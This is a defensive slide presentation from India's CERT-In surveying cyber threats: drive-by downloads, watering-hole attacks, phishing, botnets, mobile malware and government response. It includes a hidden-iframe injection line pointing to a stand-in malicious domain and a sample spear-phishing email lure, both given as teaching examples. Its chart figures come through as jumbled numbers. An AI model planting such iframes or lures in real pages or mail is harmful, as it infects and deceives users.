Cyber Security Threat Landscape

Bhupendra Singh Awasya, GCIH, GREM

Indian Computer Emergency Response Team (CERT-In)

Ministry of Communications and Information Technology Department of Information Technology

Government of India

Topics of Discussion

• Cyber security incident trends • Drive-by-download • Watering hole attack • Client side/Targeted attacks/RATS

• Mobile malware threats • DNS Changer Malware • Actions of Government

– Cyber Security Policy – Crisis Management

• Cyber security best practices – expectation from organizations • Current challenges and way forward

Threats

Any circumstances or event that has the potential to cause harm to a system or network .That means, that even the existence of an (unknown) vulnerability implies a threat by definition. [CERT]

Any circumstances or event that has the potential to cause harm to a system or network. That means, that even the existence of an (unknown) vulnerability implies a threat by definition. [CERT]

An event, the occurrence of which could have an undesirable impact on the well-being of an asset. (ISC)2 International Information Systems Security Certification Consortium

A Threat can be either • Intentional (i.e., intelligent; e.g., an individual

cracker or a criminal organization)

• Accidental (e.g., the possibility of a computer malfunctioning, or the possibility of an "act of God" such as an earthquake, a fire, or a tornado)

• Or a circumstance, Unintentional, By-chance

Understanding Threats

•Employees •Malicious intended guys •Ignorant •Non-employees •Outside attackers •Natural disasters

•Disruption of Service •Expose sensitive information •Alter information •Damage information •Delete information •Funny jokes •Publicity, peer recognition •Monetary gain •Revenge/Defaming others •Political means •Terrorism •Curiosity, testing skills/system

•Social Engineering •Virus, Trojan horses, worms •Key-loggers •Exploitation of vulnerabilities •Packet replay •Packet modification •IP spoofing •Mail bombing •Various hacking tools •Password cracking •Cross-site scripting •SQL injection

•Transmission Threats •Eavesdropping/Sniffer •DoS/DDoS •Covert channel •Spoofing •Tunneling •Masquerading/man-in-the middle attacks

•Malicious Code Threats •Virus •Worms •Trojans •Spyware/Adware •Logic Bombs •Backdoors •Bots

•Password Threats •Password crackers

•Social engineering •Dumpster diving •Impersonation •Shoulder surfing

•Physical Threats •Physical access •Spying

•Application Threats •Buffer overflows •SQL Injection •Cross-site Scripting

•Improper usage/Un-authorized access •Hackers •Greyhats, Whitehats, Black hats •Internal intruders •Defacement •Open Proxy- Spam •Phishing

•Other Threats •Mobile code

Classification of Information Security Threats

National level

• Cyber Terrorism • Attacks on Critical

Infrastructure • Web defacement • Website intrusion and

malware propagation • Malicious Code • Scanning and probing • Denial of Service &

Distributed Denial of Service

• Cyber espionage

Organisational level

• Website intrusion/ defacement

• Domain stalking • Malicious Code • Scanning and probing • Denial of Service &

Distributed Denial of Service

• Targeted attacks • Phishing • Data theft • Insider threats • Financial frauds

Individual level

• Social Engineering • Email hacking & misuse • Identity theft & phishing • Financial scams • Abuse through emails • Abuse through Social

Networking sites • Laptop theft

Cyber threats

Few years ago, 2006 and earlier, “No one ever thought of spreading

malware via legitimate websites.”

Drive-by-download

• Downloads which a person authorized but without understanding the consequences

(e.g. downloads which install an unknown or counterfeit executable program, ActiveX component, or Java applet).

• Any download that happens without a person's knowledge. • Download of spyware, a computer virus or any kind of malware

that happens without a person's knowledge.

Unintended download of computer software from the Internet:

1.2 Infect a legitimate website

1.1 Create a Malicious website

Legitimate website

Malicious website

Attacker

2 User request legitimate website

3 Website response including malicious code

4 User’s browser request for content from malicious website

5 Malicious website successfully delivers malware/virus

Legitimate user’s system

Req.

Resp.

Connect Attacker

Malware authors are shifting their focus

from traditional desktop bases attack methodology to the new emerging

dynamic and user interactive web applications for spreading malware

Watering Hole Attack Watering Hole is a computer attack strategy identified in 2012 by RSA. * The “watering hole” attack consists to inject malicious code onto the public Web pages of a site that the targets use to visit. * The attacker wants to target a particular group (organization, industry, or region). The attack consists of three phases:

– Guess (or observe) which websites the group often uses. – Infect one or more of these websites with malware. – Eventually, some member of the targeted group will get infected.

Initially exploited Internet Explorer zero-day vulnerability

Why attackers are using this . . .

In this attack vector, attackers will Compromise a legitimate website and plant a piece of malicious code in it, which will be served to all legitimate users of that website.

How do they do ??? • Web defacement

– Exploitation of Application vulnerabilities (Joomla, PHP, ASP, JSP, CPanel vuln. etc)

– SQL Injection – RFI/LFI – Hacking of credentials (admin) – Web shells

• Website intrusion and malware propagation

– SQL injection (automated) – Asprox botnet – Gumblar (stolen FTP credentials) – Toolkits – Mpack, Neosploit, Luckysploit, Phoenix, Crimepack

etc

Once the malware/virus is planted on user's computer, a remote attacker/hacker can: - Access on the infected computer - Steal user credentials, banking or other passwords - Use as a launching pad for further attacks - Install more sophisticated malwares/viruses - Gain chain of access to corporate networks via VPN etc for which user or user's system is allowed for.

<iframe src=”http://malicious.domain/” width=0 height=0 OR style=”visibility:hidden;position:absolute”></iframe>

Stolen admin credentials

Another popular vector, other than SQL injection and cross-site scripting is Stealing FTP service credentials.

Most of the websites are managed their website contents via FTP uploads.

Gumblar Gumblar performs the following tasks: - Stealing FTP credentials - Send SPAM - Install fake anti-malware - Google search/query hijacking - Disabling security software like desktop firewall and antivirus

Attackers can: - Use URL shortening services like, http://tinyurl.com/

http://bit.ly/ For hiding the actual URL - Upload malicious code embedded (PDF, DOC, XLS, SWF, PPT)

- iFrame, JavaScript code in comment fields

Social engineering • How an unwitting user become more

social? “Social engineering is the act of manipulating people into

performing actions or divulging confidential information.”

• Intentions: – Phishing/ Financial Frauds – Malware Propagation – Nigerian (419) scams

Social engineering Scams

– Advance fee fraud/ Nigerian(419) Scams • Term "419" refers to the article of the Nigerian Criminal Code

"Obtaining Property by false pretences; Cheating“, dealing with fraud • Variants

– Purchasing goods and services – Check cashing – Lottery scam – Fake job offer – Beneficiary of a will – Charity scams – Friend/Lost wallet scam – Fraud recovery scams – and many many more….

Phishing

• The term Phishing is derived from ‘fishing’ password + fishing = phishing

“Phishing is the act of sending a communication

(Email/Message/Fax/SMS) to a user falsely claiming to be an legitimate enterprise/Brand in an attempt to scam the unsuspecting user into disclosing sensitive private information that will be used for identity theft. ”

Phishing in the name of Tax Refund

27

Phishing in the name of RBI

28

Spear phishing

Attack on client side software

• PDF Reader/ Flash • Microsoft office applications • Takes place normally via interesting and

relevant email / local language with Microsoft Office/ PDF attachments. Can be hosted on websites are lure the victim to get it opened.

• Designed to target a specific individual or organisation

• Aim is to extract sensitive/valuable information

Recently seen

Attack tool kits – Vulnerabilities exploited

Source: Exploitkits overview - Kaspersky Labs

Targeted attacks - example

From: Sr Manager [mailto:Srm@abc.com] Sent: Tuesday, 19 January, 2010 5:14 PM To: Srm@abc.com bcc: Target1@abc.com, target2@abc.com Subject: Urgent document for agenda items for the coming meeting Dear Mr. (Target) I am attaching the agenda items for a probable meeting for discussing briefing points for the board meeting. For confidentiality reasons the attached file is password protected, the password for the attached file is:- “abc123”. Please have a look and send your comments and input material to me ASAP. Regards Ram Mathur

BlackHat SEO • SEO poisoning

BlackHat SEO is a maliciously-motivated search engine optimization technique that takes advantage of search engine functionality to promote malicious websites to the top of search results.

• How a search can be poisoned??? Typically upload PHP scripts to the compromised sites. Scripts query Google’s trending topic service and then generate relevant HTML for the hottest search terms.

– Campaigns seen: holidays, sales events, natural disasters, much anticipated product announcements, sporting events, celebrity gossip,

TV shows, and popular toys.

Recent trends shows Google Image Indexes are poisoned

SEO Poisoning

Rogue Antivirus - Scareware

Rouge antivirus "AVG -Antivirus 2011" shortcut icon:

Rouge for MAC OS X • MAC Defender

– http://www.cert-in.org.in/s2cMainServlet?pageid=PUBVA01&VACODE=CIVA-2011-1185

Most popular technique for identity theft seen:

MESSAGE OFFERS A “SPECTACULAR VIDEO OR CLAIMS “YOU APPEAR IN THIS CLIP The bait normally comes from the profile of a friend whose account has already been hacked.

Users typically receive a message (which appears to be genuine) suggesting the recipient clicks a link for one reason or another. In most cases, the message offers a “spectacular video” or claims “you appear in this clip”, or catchy themes to be lured easily, and normally includes the user name of the recipient.

39

Malware through facebook

Links to malicious sites

Attack toolkit geo aware

Malware delivery to few countries

Facebook like jack

How they can change the world: Discussion on “DNS Changer

Malware”: operation click ghost

• 4 million computers infected.

• Exploited default username password in DSL routers

and also used other malwares like Koboface to spread.

• The malware hijack the domain name system (DNS) on infected systems.

• The FBI shut the operation and used temporary servers to give people time to fix the problem and still use their computers.

44

Mobile Threats

• The mobile counterparts. • Zitmo(Zeus In The Mobile),

Spitmo(SpyeyeIn The Mobile), carberp • Multitude among almost the major

platforms.(Android, Symbian, Blackberry)

Quick Response Code (QR Code)

Use your tablet or phone camera to scan this image to visit our website!

• Visit our Website @

!! What if Setup by Attacker- Social-Engineer Toolkit (SET) for Launching Attack!!

Web-Application Attacks

• Low-hanging Fruit – In-house developed- **Develop your website just Rs. 500/-**.

• “75% of all attacks occurring at application layer”—Gartner

• “8 out of 10 websites are vulnerable to attack”—WhiteHat Security Team

• Web apps account for 80 percent of internet vulnerabilities

Attacks • Cross Site Scripting (XSS) • SQL Injection • Cross Site Request Forgery (XSRF) • Malicious File Upload • Remote File Inclusion (RFI) • Command Injection ….& more

Threat Trends

Year Rank

2013 2

2012 4

2011 10

Threat Landscape

Botnet trends - India

2102 1279

15160

8514

6182 5537 74753

7055 5903 5219

6435 8866

277697

590362 630025

1495485

453076

68824 28854

188295 202478 96114

49759

28197

35659

158851 69183

1736353

2116482

39600 32242

263196

153196

274224

617365

0

500000

1000000

1500000

2000000

2500000 Ja

n/08

Feb/

08

Mar

/08

Apr/0

8

May

/08

Jun/

08

Jul/0

8

Aug/

08

Sep/

08

Oct

/08

Nov

/08

Dec

/08

Jan/

09

Feb/

09

Mar

/09

Apr/0

9

May

/09

Jun/

09

Jul/0

9

Aug/

09

Sep/

09

Oct

/09

Nov

/09

Dec

/09

Jan/

10

Feb/

10

Mar

/10

Apr/1

0

May

/10

Jun/

10

Jul/1

0

Aug/

10

Sep/

10

Oct

/10

Nov

/10

Dec

/10

Conficker

Mariposa

Botnet trends – 2012-13

883025

583138

508125

178710

89319

77778

72152

51815

35078

32691

22969

18062

16316

11200

10479

9884

7667

7529

4363

3973

0 100000 200000 300000 400000 500000 600000 700000 800000 900000 1000000

torpig

dnschanger

mebroot

Ponmocup

Gozi

spam

ZeuS

TDSS

Artro

SpyEye

irc

DDoS.DirtJumper

Carberp

Gbot

honeypot

Oficla

pushdo

Ramnit

DDoS_DirtJumper

DDoS.Armageddon

Botnet trends (Top 20 Infection) India (2011)

1552529

63041

62872

62653

43881

10116

5041

4781

3841

3688

3096

3054

2725

2514

2293

1446

1368

1303

1281

1185

1062

0 200000 400000 600000 800000 1000000 1200000 1400000 1600000 1800000

ZeroAccess

pushdo

Sality_Virus

zeus

spam

Pushdo_Spambot

GameOver_Zeus

zeus-p2p

Beebone

grum

torpig

slenfbot.5050

Neurevt

DDoS_DirtJumper

Virut_botnet

Pony

blackenergy

Ransomware

Dofoil

TDSS

KeySpy

Botnet trends – October 2013

Timeline of computer malware

Attack tool kits • Web attacker .. • Mpack..Fragus • Neosploit, Luckysploit, Icepack • Blackhole, Eleonore • Zeus

– Random registry keys (RC4 Encryption)- Multiple compromises of victim by different attackers using same kit – difficult to clean

• Mariposa – HTTP Post stealing, blended defense mechanisms

• SpyEye – competes with Zeus

Attack Toolkit - MPack

6 Levels of simultaneous action • Government

– Policy, Plan, IT Act, Directives, CMP • Public – Private Partnership

– Joint Working Group • Technical

– Honeypots, sensors, situational awareness, R&D • CIIP and CERT

– Section 70A and 70B of IT Act • Individual /Professional

– Awareness & capacity building • International

– Information sharing and cooperation

Security of Cyber Space – Snap shot of efforts

• Enabling legal framework

• Cyber security assurance framework (product, process, technology and people)

• Alert and advisory framework – Network of National CERT and sectoral CERTs

• Capacity building framework – training & awareness and skilled manpower

• Critical Information Infrastructure Protection (CIIP)

• Cyber security research and development

• Information sharing and cooperation framework – National and International

• Public private partnership (JWG)

Security of Cyber Space – Snap shot of efforts

8 Frameworks for focused action

Actions at organisational level • Security policies and procedures • CSIRT/CISO/Administrator/Users • Multi-layered defense mechanism

– Network behavior analysis – Perimeter Defense – Security Information and Event Management – Database Activity Monitoring

• Updated/Patched applications • Host based Intrusion Prevention System • Content inspection systems/DPI at perimeter, DLP • Pre defined procedures for information sharing • Authentication & authorisation to secure information and prevent data

leakage • Authentication of emails (Digital signatures) • Auditing and Pentest • User awareness

Way forward … • Fostering collaboration between Government and Industry

• Implementation of security best practices based on global standards

• Use of validated and certified IT products and devices

– India is an Authorizing Nation under Common Criteria Recognition Arrangement (CCRA)

• Creation of mechanisms for auditing of Industrial Control systems and associated IT systems and Empanelment of ICS Auditors

• Secure application / software development process

• Information exchange on vulnerabilities and threats in trusted manner

• Creation of Incident Response teams at entity level

• Capacity building

• Mock drills for improving security posture of CII including simulated attacks on ICS devices

Thank you

Incident Response Helpdesk

Phone: 1800 11 4949

FAX: 1800 11 6969

e-mail: incident@cert-in.org.in

http://www.cert-in.org.in